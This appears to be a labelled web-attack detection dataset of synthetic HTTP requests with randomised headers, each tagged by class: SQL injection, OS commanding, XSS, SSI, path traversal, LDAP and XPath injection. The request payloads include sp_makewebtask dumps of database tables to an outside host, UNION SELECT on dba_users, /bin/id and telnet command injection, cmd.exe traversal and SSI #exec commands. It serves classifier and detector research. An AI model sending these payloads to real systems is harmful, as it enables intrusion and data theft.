Upgrade: hs1gw/0.3, rdt/3.0
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

Hn=$rIu&tinh8Tea=4036&agiobAzloebt=8npasswd>&ai313E8ogau=7759&dLqanten=2&vmrrsAarqSys=sd9fhh9ilSwyast&i7lf=sn_m6q&grweeedssw=lor9MC&r9eee8oilhal=crwcuio&nw=yo-nso9yuYnz&.lconnectadminL=0937  or     count(path/child::node()[position()=((i+j+k+l+1)] |  path/child::*()[position()=(k+1)])=1   or    368=&HgBkE=84700167&oIr=iTx5KX7O&eD0vth=0

End - Id: 35523
Start - Id: 41028
class: SqlInjection
GET /hF_Yy0qbmamj8us5k/BD/nny3yHSAjvSHz/hbW3xOq4nV/m0MT5Vb9hZ.S/tfHyuF_Kl0BgjJ-ho/Osf4ewtdcetzd/tFI/o3gS/dKduJ/tn.tiff?fjKEf=tentk&Utns5=aeornsfjrl6a&jhhao=OhsAlteAtGar%7C%3Dq&U2t.Nb9iAeN=%27%3B+EXEC+master..sp_makewebtask++++%22%5C%5C154.56.23.27%5CehK%5CoNnttt.htm%22%2C+++%22SELECT+*+++++FROM+INFORMATION_SCHEMA.TABLES%22&tkaafdaSoofs=poaeb&6Fy_UqfE5R=Encoehyt HTTP/1.0
Host: 96.47.188.61:86
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-japanese;q=0.6, koi8-r;q=0.9
Accept-Encoding: deflate, deflate;q=0.6, gzip, compress;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 2.230.114.150
Cookie: rrplike@passwdjY=2Qdnmj.;jtls=hi1;rsiMiR6itAAhts=(eliftp;eeAinz=133019;ui6welinr=nXfBz-e-;nMidmiuQ50e=ynldcuxinirSxtdB
Cookie2: $Version="66"
Date: Sat, 30 Jul 05 23:33:10 CET
ETag: W/"e8h6IKFwFygF.9A6w624"
Expect: yuEtt
From: spbhn@ispeCheey.net
If-Modified-Since: Tue, 17 Feb 09 14:47:11 CET
If-Unmodified-Since: Tue, 23 Nov 04 05:32:03 CET
If-Match: *
If-None-Match: *
If-Range: "sH_uqNUxLh_eR52wUKe"
Max-Forwards: 4
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 770-,-93926
Referer: http://tninipt.be/tAinOue/ds1anst5/73hdswn.pdf
TE: trailers,trailers,gzip;q=0.9
User-Agent: lse0t4 (3EIxfE; ezurX0Y; 6DAVHXQ; a8lXjd; fko_9s-H)
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: dlbsd/2.7 45.187.138.214
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41028
Start - Id: 45211
class: PathTransversal
GET ////? HTTP/1.0
Host: 137.89.48.209
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-3, iso-8859-8, macintosh;q=0.3, windows-1253;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=824
Client-ip: 115.213.88.73
Cookie: sAF%uqfi=reaccess_logftpme
Cookie2: $Version="5"
Date: Tue, 11 Sep 07 11:19:28 CET
ETag: W/"_42@pBjVbX4bYLjRIkl"
Expect: EEer
From: 1p4rry@estl2a.org
If-Modified-Since: Mon, 07 Aug 06 06:36:56 UTC
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: "uWjapukWjRUFRGf1"
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 35
MIME-Version: 3.6
Pragma: dicabtb='acqng8'
Proxy-Authorization: uvaesU naapebE=ehpe
Authorization: Basic ZzBrb29lZTk6M3FlMmQ=
Range: 706278-,584316-,-67
Referer: http://u1mdec.uk/hhoT/Aert/dKtsten/mtxet.tar
TE: trailers,chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 1.6; na-cr; rv:6.3.2) Gecko/76198406
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 487x2717
Via: HTTP/1.4 www.3anlhcs.html
Transfer-Encoding: deflate
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 254.23.68.104
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45211
Start - Id: 43411
class: OsCommanding
GET /Qe8y8F/tooiU9bZRDpjD.php4?zCtpgC=22&dbaiowa7mrgun=t3oetg&solzefavtgt=0&en2nW=079026&K9=%5C%3B++%5C%2Fbin%5C%2Fid++++%3B HTTP/1.1
Host: www.trpuqiosEb.be
Connection: keep-alive
Accept: text/plain;q=0.4, video/*;q=0.2, image/gif;q=0.4
Accept-Charset: x-mac-chinesetrad, euc-kr, windows-1252;q=0.7
Accept-Encoding: deflate, gzip;q=0.1, deflate, compress;q=0.2, compress
Accept-Language: quqeistx-sq5B, moc-el1, 9tiee-r;q=0.3, t-atakence, eet95E-iame;q=0.5
Cache-Control: max-stale=57
Client-ip: 5.203.243.165
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Tue, 20 Mar 07 22:01:07 CET
ETag: "jIrF8GB@jiqHJsgpERvI"
Expect: lcyAtaet=mdtsuia;3eba
From: fikl0E@tRser.fr
If-Modified-Since: Thu, 18 Mar 04 21:47:54 UTC
If-Unmodified-Since: Mon, 05 Nov 07 04:04:25 UTC
If-Match: *
If-None-Match: "dArfG8Dj3X@8.zhP"
If-Range: *
Max-Forwards: 61
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth-int
Range: 6-,47-768842,6146-09
Referer: http://www.rfelv.cz/nih9/ZomMyur/0rkho/dlt3qcie.asp
TE: trailers,gzip
Trailer: Expect
User-Agent: 76etu6cedis
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: compress
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 193.68.229.100
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43411
Start - Id: 47532
class: XSS
GET /wnnlgmcrmtm/co1hCIqFzn_Cv/ax-L9t-oTBt.vbjwc/7.D/Zrttreo0/iuewiwmutxiealhae.jpg?tDiii=0797227&tltoaws34l2m1gE=4401&lilg=2014&e0Eputme=48htEpnrd&wUirbl_JX=%3Cdiv++++style%3D++%22++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.matrto.com%2Fscript%2FhT.cfm%5D%29%3B++%22+++%3E&oce=7ls&sjupdatePZ=htpassls&ee9Yemyeral=iinieh+e&yr=8665306&rl6hsserunrsa=41&eiea=ar&oona5trti=E5xBFry&hovtrailit=5335&php5sKx7PmiQqhaving=1tYeelrsrkseoxte&t5qly9prW=7984 HTTP/1.0
Host: 80.81.70.153
Connection: a7fhc
Accept: video/*
Accept-Charset: euc-kr;q=0.9, x-mac-arabic
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 3.105.200.122
Cookie: 69QiKtp=e;C2s6e=o-
Cookie2: $Version="0"
Date: Sat, 29 May 04 06:02:56 CET
ETag: W/"MF.rOlxIiF0Dx6w"
Expect: pnInt
From: rxai5au@cfrdhneel.st
If-Modified-Since: Tue, 14 Dec 04 18:32:07 CET
If-Unmodified-Since: Mon, 21 Mar 05 16:30:04 UTC
If-Match: "JB@tTM7-v87QCR89Sz_"
If-None-Match: *
If-Range: "UL_xPTr96AZwl97pC"
Max-Forwards: 17
MIME-Version: 0.2
Pragma: bo=es
Proxy-Authorization: NTLM dWVKZW42Uml3cGhOYWhhbzdrbnRvZWFub1A4aTRhcmlhdQ==
Authorization: NTLM aW51YTFhZWlmYTNzdWltYTlMYTJkcjdycm40YXRoY2U3THM=
Range: 924-,916951-
Referer: /4loegso/tf82s1rE/oaHr/dtSo.gif
TE: gzip
Trailer: TE
User-Agent: Mozilla/2.3 (Windows; U; WinNT 3.5; hn-1X; rv:9.5.0) Gecko/97685067
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: gzip
Upgrade: atsa/8.3
Warning: 758 232.178.55.106 "aerbantiefsyete" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47532
Start - Id: 40241
class: SSI
GET /hdvH1wF0c5C/g5dIpam.rvClQJTNEMY/q11cWbQsfK2G./sw1rphpiO/n1u/n6QMYpf8X/d@l6gZBsUxq/9dAdp3dA3O7TORgV/WpiframeL/iWNbAx.JRlkkQ.cfm?drtitbrooM=p&stfe6tmhiasn=3049646&rxB=+servicesvn+fo6emEoine2nbrcf&ntAwareataft=hm&daimgFnetcatdocumentYQnw=yirk2O48onwinnt6C&ARQq7=93266&ecrictgydka=eheEc&ayhird0amt=14969&bw1EL=on&nu8o=eGYrzDR&ehlqihr5ol=sOnivh&tnetl5om=Hilneuveeo%3B&es=%26log&nm0vzrcuZ=eiarwv9nninroJatie HTTP/1.0
Host: www.io4lp.cz
Connection: close
Accept: video/quicktime;q=0.3, text/*;q=0.3
Accept-Charset: windows-1252;q=0.0
Accept-Encoding: *
Accept-Language: th2-pdi2r, nns-ogEWsd;q=0.1
Cache-Control: haompsn=gh
Cookie: mnSbwynrnnof=7;ceh=35;7q4aNeahi=pnch0an;nea0re=<!--    #exec  cmd="c:\progra~1\gNoattt\irac1da\sAa.exe d:\tlle17d\www.naassiniel.org\3xsv\database.mdb /x exporttofoxpro"-->
Date: Sun, 08 Jul 07 24:08:06 UTC
ETag: W/"DY-pTrxmjyberCRl6Irr"
Expect: 100-continue
From: ltensne@Rm7ipT.cz
If-Modified-Since: Thu, 05 May 05 17:36:33 CET
If-Unmodified-Since: Sat, 26 Sep 09 18:31:06 UTC
If-Match: *
If-None-Match: "tDnEGmI-Id-P.X7Ear8z"
Max-Forwards: 50
Pragma: no-cache
Authorization: yaws rthQsoa=rren
Referer: http://www.St0o.st/7e4iok.fgf
User-Agent: nXI5XpR4 http://www.rnh9.biz
UA-OS: Solaris
UA-Color: color16
Via: 9a89s/1.7 59.31.88.246
Transfer-Encoding: compress
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40241
Start - Id: 39196
class: SSI
PUT /zQ7wukPil.kcqf/r8/mef/ecadeVlcyctnng9A/c0netheoptHorzcdnB6n/LKhEKxCGNeiHh/ieew/iuBfNuIHKx0W.jpg? HTTP/1.0
Content-Length: 189
Content-Language: ldt
Content-Encoding: deflate
Content-Location: /ln9f/utoeoast/oteo4xrs/dCeeesn.jpg
Content-MD5: dHdFbHZkaWNzbWVocm1DZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Mar 10 03:23:05 GMT
Last-Modified: Sun, 29 Oct 06 24:01:12 UTC
Host: www.ely0sas.com
Connection: nuadni
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i4wxcTid-et2vb
Cache-Control: idUo='oae'
Client-ip: 215.91.4.112
Cookie: nyfatyrh9=eOstatb;yI2rmY4SjmKM=dh ;0xiarpM=00938;Wl8l=tofrom;YDGvyvbscriptZqn=504
Cookie2: $Version="690"
Date: Tue, 04 Jul 06 12:34:30 UTC
ETag: W/"kvcPC.rwja1VSKiIHBI"
Expect: 100-continue
From: nGxh@nraae5E.gov
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Tue, 06 Dec 05 11:19:41 UTC
If-Match: "ll@iozLd73iy4MuJY_"
If-None-Match: "buUy7ulYGta65KvPnS5"
If-Range: "nIPxMLXiobi6t._wG"
Max-Forwards: 357
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: -6444
Referer: /sEbnsa30/iLih/PAwemo/le2xqem/otez.zip
TE: gzip;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (X11; U; Linux i586 1.6; tL-nb; rv:9.8.3) Gecko/41971953
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: 8.1 www.e7Ns.gif:89, HTTP/1.7 www.6sbtewi.jpg, FTP/8.5 123.140.73.69
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5oaLst=eor04g0nhehlpe&bdn=s0&ptxthRoimm=498&inxuttewNorhs=<!--     #exec     cgi="/cgi-bin/script?hb1t"  -->&p3arSoico3dJ=28&2Cl5FVconnect=-4b&ceb3NeSnnhRwgie=a6BMZ.Bz4G

End - Id: 39196
Start - Id: 41467
class: SqlInjection
POST /cehtstnmounumotiet/aiotaovDfanuajq/npA.5A3RLTmln/aas8zgtokbbJs/uagsdOu8euce4/cU589HwD7W2mLC/asAte6ukhdeai0d/znF14H9s6g/9myv8CY/eeeon7IthM1rel5qmj6/mGo2dCCqFWTGcc4/i8hhlt1g.shtml? HTTP/1.1
Content-Length: 249
Content-Language: merRjBti
Content-Encoding: compress
Content-Location: http://ng6nGr.com/eN9im/ltE6t.avi
Content-MD5: aHluZG5vY3lLNGljY01uZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Sep 07 17:57:45 UTC
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: 223.190.125.94
Connection: keep-alive
Accept: image/*, image/jpeg
Accept-Charset: shift_jis;q=0.9
Accept-Encoding: compress;q=0.5, compress, compress
Accept-Language: *
Cache-Control: esyaocee='8'
Client-ip: 79.61.119.137
Cookie: hev=12282;Yh0bc=3;ct9=sr9u>;LsstoLZrtosbpdr=3;rm=9bainljietaldss;aqy=i zes?eacz egijr6p
Cookie2: $Version="67"
Date: Sun, 07 Nov 04 08:55:41 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Sat, 04 Aug 07 23:49:30 CET
If-Match: "M3AVgpaAqRcFoUfqHzc"
If-None-Match: *
If-Range: Thu, 03 Jun 04 14:16:54 UTC
Max-Forwards: 0
MIME-Version: 2.7
Pragma: ne=taavEa
Proxy-Authorization: NTLM bHd1aG10VHRzQWhwb3BhZW84b3RpYXNjY2tlbGFhQ21laXNhaTZ0ZQ==
Authorization: Digest nc=62CBCCe3
Range: 863-,45-,1-
Referer: http://s3rweirr.it/cmftho/yehsneo/Eoaez5/ttsuta/mfSow2e.conf
TE: trailers,trailers
Trailer: Range
User-Agent: nW.6C0hao http://www.uat3.be
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 054x8213
Via: eorI/4.6 www.iHldvo.js, 3.6 142.35.38.157:7742, FTP/9.1 177.183.198.163
Transfer-Encoding: gzip
Upgrade: EorNU/7.3, mot/1.8
Warning: 103 220.132.115.129 "d1xevs" 
X-Forwarded-For: 158.24.142.97
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

stohmaJrlea=loev&Bt=csboot.inicslptk&ie5dai=jr'dfezQ8la&tnroie6ek=n-k87ww\>teLnas&ERE=4047899813&tYwJQ=heMc0io&reu=and  0<>(select    count(*)   from   rbno where   bg<>)&3Uisnvwe1eGtgo=vbz5yJ5&4t4m=woeZt-j&scsintypidiEc=redwda

End - Id: 41467
Start - Id: 43752
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.tueocea.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.1, gzip, compress;q=0.9, compress;q=0.9, gzip
Accept-Language: *
Cache-Control: tm1c=utar
Client-ip: 251.209.185.79
Cookie: 177system4YAi5=514;u2n9blpeD5=2295257394;ocoH=0776;hdzgiodpwAfew=mB dtesnph-systemaa~ y
Cookie2: $Version="1"
Date: Thu, 21 Jan 10 23:39:32 UTC
ETag: W/"S2kqKS2NgMYdq_Ze"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Mon, 16 Apr 07 17:39:19 GMT
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 4450
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: NTLM ZTRubDJ0c3NQOW9BVTNzc2llc2VpdGR1SnRyZXB1dHdt
Range: 2335-
Referer: /asmo0/4arsmbx/letoair/ihnu.pl
TE: deflate;q=0.0,trailers,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/2.9 (compatible; ldsezrii; Linux i586; itnoi8r; E2utktac)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7271x959
Via: twi/4.8 www.w2snsRo.jpeg:65, 1.5 www.c2hqy0.tiff, FTP/3.1 www.jqvjmebc.shtml
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 442223002
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43752
Start - Id: 37099
class: LdapInjection
GET /llaentopsster/log1.xYo1x/tytziawsoeeomdxwVtlq/dndtaascEhpnwd/Otwnha.htm?tnle2Eoo2eUu=+hai&aeeh=260&5SVA5C3yIJ=iysna&vap1iisbsgtx=tt%29%28++%7C%28iacsr%3D*%29&qteenbhzu2fcg6r=lSer HTTP/1.0
Host: www.umseepio.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.0
Accept-Language: *
Cache-Control: max-stale=82
Client-ip: 236.39.89.101
Cookie: eieau48=na saeform
Cookie2: $Version="020"
Date: Mon, 13 Jul 09 11:58:52 CET
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: 5cih8hH@th6En.it
If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Tue, 27 May 08 05:02:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic ZGk5b2g6bmZpcmU3
Authorization: maessy sOhmS=idhnenqn
Range: 8-29969,-67,432-912142
Referer: /dehs/wnifaptp.php3
TE: gzip;q=0.9,chunked,deflate
Trailer: Via
User-Agent: softhN1 (oYMfdVY)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: 2.2 202.62.238.81, 7.1 67.193.79.182:4
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37099
Start - Id: 35423
class: SqlInjection
GET /fxAjt5W4C1z6/dTbAn/owntstsUAcrIdazes/A.YcmdWVvQg/ma1BnDW/9VwravU/tEamces9hEeRd/dj2XpV@ZvH.jpeg?rrtsqee=cO6MM9ZsiDGD&otr5Jlirneo=m&ipoMleesw=%40lncql%3Fet1otlU%3Bgn&nat=chairs%27+UNION+++++SELECT+od+++FROM+dba_users+++WHERE+name+++like++%27%2525&pelScseIgakoda=76367&gf=phHSwQtb HTTP/1.1
Host: www.aosel.st:0207
Connection: ewrh
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eohiseDe-haazndil, de-qge4aee, sr-8R;q=0.7
Cache-Control: max-stale=62965
Cookie: eleenitbg=ue
Date: Thu, 12 Mar 09 01:41:34 GMT
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: edzd=keea
If-Modified-Since: Sun, 01 Jul 07 24:24:51 CET
If-Unmodified-Since: Wed, 14 Jan 09 04:44:55 CET
If-Match: "PYwkduxR3xQ6IRotd-C"
If-None-Match: "6414UPycTaOr9QTdR"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 450
MIME-Version: 3.1
Pragma: ya='atqs'
Proxy-Authorization: Basic c2lqb3c6c3lmd2hlSm8=
Authorization: NTLM cm9xZGVyb3JydW9mU2l4NElzeHJMaWVsaWwzYmF0Z2E2
Referer: http://www.resabe.fr/lnmexigf/t5gaUte/ezn5sw/9rcthzj.php4
Trailer: TE
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 0.8; yb-eh; rv:1.5.3) Gecko/21349441
UA-OS: Linux
UA-Pixels: 4111x1385
Via: 2.5 www.r7cejt.shtml, FTP/8.1 www.eSfjt.jpeg:29, ZT0e/7.6 www.nieae.css
Transfer-Encoding: hkHet; gnohn=gakvc7cs
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: ----------

null

End - Id: 35423
Start - Id: 41023
class: SqlInjection
GET /MxdHNqlJHiupdatey/aorisreyhfd/Techo2sY7o/pnrjttea/pW7hhttpsP/miUatjnnti8odrtiUmr/rfectixt0rdtdDauIs/ra8rmelnhXn/-e@imgwinntxqwq_.jpeg?l2aozetnt=50646&eMzak=e1lwrJ2uqoH6&Htce5ieRqau=ulyfdw&aoB7nm1sp=%27%3B++++EXEC+master..sp_makewebtask+%22%5C%5C160.194.108.199%5CeasFte%5Ctakif.htm%22%2C++++%22SELECT+++++*++FROM+++++INFORMATION_SCHEMA.TABLES%22&doeRoaeie=e-Jhx1uTBXJ&ajnd1ri=6421&HCt=+gcl&hsoseoh5f=75f9vhsL7 HTTP/1.1
Host: 188.67.186.157:80
Connection: keep-alive
Accept: application/rtf
Accept-Charset: big5;q=0.3, windows-1255, x-mac-korean;q=0.0, x-mac-turkish;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 109.121.222.214
Cookie: iaog1imetemeeor=94302;etePd=halbohsrmdlt
Date: Sat, 08 Jan 05 19:45:14 UTC
From: spbhn@ispeCheey.net
If-Modified-Since: Fri, 20 Feb 09 11:58:44 CET
If-Unmodified-Since: Tue, 14 Dec 04 02:43:23 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 6
MIME-Version: 5.4
Proxy-Authorization: Basic Ymxld3Vobm46ZWV0dGU=
Authorization: lIainj 9eeoiltf=seddibai
Range: 770-,-93926
Referer: /udfNXa/raeid.mspx
TE: trailers,trailers,gzip;q=0.9
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 8.7; nd-om; rv:8.6.5) Gecko/19322873
Via: FTP/2.4 www.hdylu.htm
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41023
Start - Id: 43521
class: OsCommanding
GET /ieRffhqe.sh?9elepihAea9unDo=a%25shsnsir9%3En&ayceoeiodf=%5C%22++%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++www.esntetrons.com+++++13%5C%3B&ypRh5liehur=96083&wjahnns2n8vtp6=zpbiitra%2Be%5Boe&fZrey=en HTTP/1.0
Host: 110.160.169.54
Connection: keep-alive
Accept: application/postscript;q=0.4, text/xml;q=0.7, video/*;q=0.0
Accept-Charset: iso-10646-ucs-2, x-mac-roman;q=0.9
Accept-Encoding: gzip, identity, compress, identity;q=0.3, identity;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 108.184.195.217
Cookie: etrfqeYj=078001;ie8t=2$(A;BBNgM=7715434;d5cDmiTrySajyi=1;YxevalGael=9
Cookie2: $Version="4"
Date: Sat, 15 Jan 05 12:32:02 GMT
ETag: "ktdX-vkOq-6vCtnMc"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Mon, 02 Aug 04 15:26:52 CET
If-Unmodified-Since: Mon, 15 Aug 05 11:40:39 GMT
If-Match: *
If-None-Match: "GuvKg8zbi9iFp-2"
If-Range: Tue, 17 Apr 07 16:41:33 CET
Max-Forwards: 232
MIME-Version: 5.5
Pragma: mrt=ct2to
Proxy-Authorization: NTLM bHNwMmNsQ2JpT3RubWVzZmFpdGtpaG9sZGlPSGlpdUVoY28=
Authorization: nnsn shi3=qiRdkawr
Range: -2781,-259,93-77910
Referer: /LOreas/uoOa/ynuaA/ilesiz/whtsklr.gif
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: nauo (3uDZPwreh; lwoBGZ99; e3keq3Lds; tKSC9MZ@7C)
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 893x087
Via: FTP/6.8 www.Ihuamoh.tiff, 2.2 2.224.77.226:7866, HTTP/7.7 252.148.237.206:31710
Transfer-Encoding: gzip
Upgrade: itme/0.9
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 119.116.114.21
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43521
Start - Id: 50107
class: XPathInjection
POST /ael8jenpta5bTee6/kQnMfS/s97ACF3swewC.1OGc_53/ko3ECdaUm/hI@AoMe@AAA/t3GUxEpcHqe5E@8Vb-/acr8ei8tvet/tzynbP/MQpC0/oincludej/nmr3pgc4sxnyeeEa/eVVQrz.gg8r.shtml? HTTP/1.1
Content-Length: 341
Content-Language: linsdn
Content-Encoding: identity
Content-Location: /iIdoa/tnun0re1.zip
Content-MD5: cXd3MGZjYWVkc2FpbnJkaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Dec 04 21:46:10 UTC
Last-Modified: Fri, 20 Oct 06 21:50:25 UTC
Host: www.cms7Uoej.gov
Connection: close
Accept: image/gif;q=0.3, text/html;q=0.0
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: Lidehb5='bjetep8'
Client-ip: 192.64.250.181
Cookie: rsrlianurese=oer/naac/b/child::node()[  position()=09]   | g1snpe/no9Tg/na/child::text()[position()=5]   or  'Oreon'  =  '
Cookie2: $Version="65"
Date: Wed, 14 Apr 10 12:53:25 UTC
ETag: W/"xxZkvUNV5QW_.u7aV"
Expect: 100-continue
If-Modified-Since: Tue, 03 Jul 07 19:00:15 GMT
If-Unmodified-Since: Wed, 12 Apr 06 01:28:33 GMT
If-None-Match: "bO6GMFzU7zvS9rdviN"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.3
Proxy-Authorization: dTgybu eztwn=NSi2fr
Authorization: Basic N2FpZWVhOmVyaXM2YQ==
Range: 6888-
Referer: /iiigeTi.cfm
TE: chunked,chunked,trailers
User-Agent: eloehrsstt
UA-Disp: 139,013,32
Via: 4.1 32.129.124.219
Transfer-Encoding: n3ssh
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ihlOrnidsche=tt&ahis8ifloEde=eS9xeftiwbos2NemEf&ens8t3s=lTdobqupdateo)[rhe0s6?&nreaio2tyhiu=1804782454&oiitlx=seN&coevKre=1hon3goseEit&hshutdown5YBBWey1update=616569&ereenisnisde=hisdrhioerwsn&Seahantg9Rt6t=oekrefti0hnveho2JU&yefa=95707&ojothqnpkateids=2&3EmTv=mkGaC-1E&risshe7b=iAcdameo&9benactiict0ca=pt tg7&5turiau=ddxt0jssooHxvu6oo

End - Id: 50107
Start - Id: 44402
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: 97.202.29.186:81
Connection: htiet5
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.4, deflate, gzip;q=0.3, deflate, identity;q=0.1
Accept-Language: *;q=0.8
